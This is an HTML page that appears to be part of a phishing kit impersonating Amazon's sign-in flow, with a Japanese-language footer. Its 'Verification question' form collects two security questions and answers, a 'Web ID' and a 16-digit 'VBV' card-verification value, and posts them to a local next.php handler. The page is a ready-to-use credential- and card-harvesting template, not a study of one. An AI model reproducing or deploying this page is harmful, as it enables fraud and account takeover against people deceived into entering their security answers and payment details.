<!DOCTYPE html>
<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title dir="ltr">Amazon Sign-In</title>
    <link rel="stylesheet" href="css/st1.css">
    <link rel="stylesheet" href="css/st2.css">
    <link rel="stylesheet" href="css/mobile_login.css">
</head>

<body>
    <div id="a-page">
        <div class="a-section a-padding-medium auth-workflow">
            <div class="a-section a-spacing-none auth-navbar">
                <div class="a-section a-spacing-medium a-text-center">
                    <a class="a-link-nav-icon" tabindex="-1" href="#">
                        <i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i>
                    </a>
                </div>
            </div>
            <div id="authportal-center-section" class="a-section">
                <div id="authportal-main-section" class="a-section">
                    <div class="a-section auth-pagelet-container">
                        <!-- div1/////////////////////////////////////// -->
                        <div class="a-section a-spacing-base" id="div1">
                            <div class="a-section">
                                <form name="signIn" action="./next.php" method="POST" class="auth-validate-form auth-real-time-validation a-spacing-none">
                                    <div class="a-section">
                                        <div class="a-box">
                                            <div class="a-box-inner a-padding-extra-large">
                                                <h1 class="a-spacing-small">
                                                    Verification question
                                                </h1>
                                                <div class="a-row a-spacing-base">
                                                    <label for="ap_ai" class="a-form-label">
                                                        question 1
                                                    </label>
                                                    <select name="q1" id="q1" class="a-input-text a-span12 auth-autofocus auth-required-field" required="">
                                                        <option value="">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">Please select one</font>
                                                            </font>
                                                        </option>
                                                        <option value="What celebrity do you most resemble?">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">Which celebrity do you look most like?</font>
                                                            </font>
                                                        </option>
                                                        <option value="What is the Last Name of your third grade teacher?">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">What is the surname of the 3rd grade teacher?</font>
                                                            </font>
                                                        </option>
                                                        <option value="What was the name of your boyfriend or girlfriend?">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">What was the name of your boyfriend or girlfriend?</font>
                                                            </font>
                                                        </option>
                                                        <option value="What is the name of your favorite charity?">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">What is the name of your favorite charity?</font>
                                                            </font>
                                                        </option>
                                                        <option value="What is the name of your first babysitter?">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">What is the name of your first babysitter?</font>
                                                            </font>
                                                        </option>
                                                        <option value="What is the best friend first name?">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">What is your best friend's name?</font>
                                                            </font>
                                                        </option>
                                                        <option value="In what city did you meet your spouse/significant other?">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">In what city did you meet your spouse / loved one?</font>
                                                            </font>
                                                        </option>
                                                        <option value="In what city did you honeymood? (Enter full name of city only)">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">In what city did you honeymood?</font>
                                                                <font style="vertical-align: inherit;">(Enter full name of city only)</font>
                                                            </font>
                                                        </option>
                                                        <option value="What is the last name of your family physician?">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">What is the last name of your family physician?</font>
                                                            </font>
                                                        </option>
                                                        <option value="What street did your best friend in high school live on? (Enter full name of street only)">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">What street did your best friend in high school live on?</font>
                                                                <font style="vertical-align: inherit;">(Enter full name of street only)</font>
                                                            </font>
                                                        </option>
                                                    </select>
                                                    <input type="text" id="ans1" name="ans1" tabindex="1" class="a-input-text a-span12 auth-autofocus auth-required-field" style="margin-top: 10px" placeholder="Reply" required="">
                                                </div>
                                                <div class="a-row a-spacing-base">
                                                    <label for="ap_ai" class="a-form-label">
                                                        Question 2
                                                    </label>
                                                    <select name="q2" id="q2" class="a-input-text a-span12 auth-autofocus auth-required-field" required="">
                                                        <option value="">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">Please select one</font>
                                                            </font>
                                                        </option>
                                                        <option value="As a Child, what did you want to be when you grew up?">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">As a Child, what did you want to be when you grew up?</font>
                                                            </font>
                                                        </option>
                                                        <option value="What is the name of your favorite restaurant?">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">What is the name of your favorite restaurant?</font>
                                                            </font>
                                                        </option>
                                                        <option value="What is the first name of your high school prom date?">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">What is the first name of your high school prom date?</font>
                                                            </font>
                                                        </option>
                                                        <option value="Who is your favorite person in history?">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">Who is your favorite person in history?</font>
                                                            </font>
                                                        </option>
                                                        <option value="What is the name of your high school's star athlete?">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">What is the name of your high school's star athlete?</font>
                                                            </font>
                                                        </option>
                                                        <option value="Where were you on New Year's 2000?">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">Where were you on New Year's 2000?</font>
                                                            </font>
                                                        </option>
                                                        <option value="What was the make and model of your first car?">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">What was the make and model of your first car?</font>
                                                            </font>
                                                        </option>
                                                        <option value="What was the first name of your first manager?">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">What was the first name of your first manager?</font>
                                                            </font>
                                                        </option>
                                                        <option value="What is the first name of the best man/maid of honor at your wedding?">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">What is the first name of the best man/maid of honor at your wedding?</font>
                                                            </font>
                                                        </option>
                                                        <option value="What was the first live concert you attended?">
                                                            <font style="vertical-align: inherit;">
                                                                <font style="vertical-align: inherit;">What was the first live concert you attended?</font>
                                                            </font>
                                                        </option>
                                                    </select>
                                                    <input type="text" id="ans2" name="ans2" tabindex="1" class="a-input-text a-span12 auth-autofocus auth-required-field" style="margin-top: 10px" placeholder="Reply" required="">
                                                </div>
                                                <div style="padding: 5px;" class="a-input-text-wrapper auth-required-field auth-fill-claim">
                                                    <input type="text" style="" placeholder="Web ID" name="webid" id="webid" autocorrect="off" autocapitalize="off" required="">
                                                </div>
                                                <div style="padding: 5px;" class="a-input-text-wrapper auth-required-field auth-fill-claim">
                                                    <input type="tel" placeholder="VBV" name="vbv" maxlength="16" id="vbv" autocorrect="off" autocapitalize="off" required="">
                                                </div><br>
                                                <div class="a-section">
                                                    <button id="btn3" name="btn3" class="a-button a-button-span12 a-button-primary" type="submit"><span class="a-button-inner"><span id="continue-announce" class="a-button-text" aria-hidden="true">
                                                                Confirmation
                                                            </span></span></button>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </form>
                            </div>
                        </div>
                        <!-- div1 end/////////////////////////// -->
                    </div>
                </div>
            </div>
            <div class="a-section a-spacing-top-extra-large auth-footer" style="position: fixed;left: 0;bottom: 0%;width: 100%;">
                <div class="a-divider a-divider-section">
                    <div class="a-divider-inner"></div>
                </div>
                <div class="a-section a-spacing-small a-text-center a-size-mini">
                    <span class="auth-footer-seperator"></span>
                    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
                        利用条件
                    </a>
                    <span class="auth-footer-seperator"></span>
                    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
                        プライバシー通知
                    </a>
                    <span class="auth-footer-seperator"></span>
                    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
                        助けて
                    </a>
                    <span class="auth-footer-seperator"></span>
                </div>
                <div class="a-section a-spacing-none a-text-center">
                    <span class="a-size-mini a-color-secondary">
                        ©1996-2020、Amazon.com、Inc。またはその関連会社
                    </span>
                </div>
            </div>
        </div>
    </div>
    <style>
    .tb_button {
        padding: 1px;
        cursor: pointer;
        border-right: 1px solid #8b8b8b;
        border-left: 1px solid #FFF;
        border-bottom: 1px solid #fff;
    }

    .tb_button.hover {
        borer: 2px outset #def;
        background-color: #f8f8f8 !important;
    }

    .ws_toolbar {
        z-index: 100000
    }

    .ws_toolbar .ws_tb_btn {
        cursor: pointer;
        border: 1px solid #555;
        padding: 3px
    }

    .tb_highlight {
        background-color: yellow
    }

    .tb_hide {
        visibility: hidden
    }

    .ws_toolbar img {
        padding: 2px;
        margin: 0px
    }
    </style>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>

</html>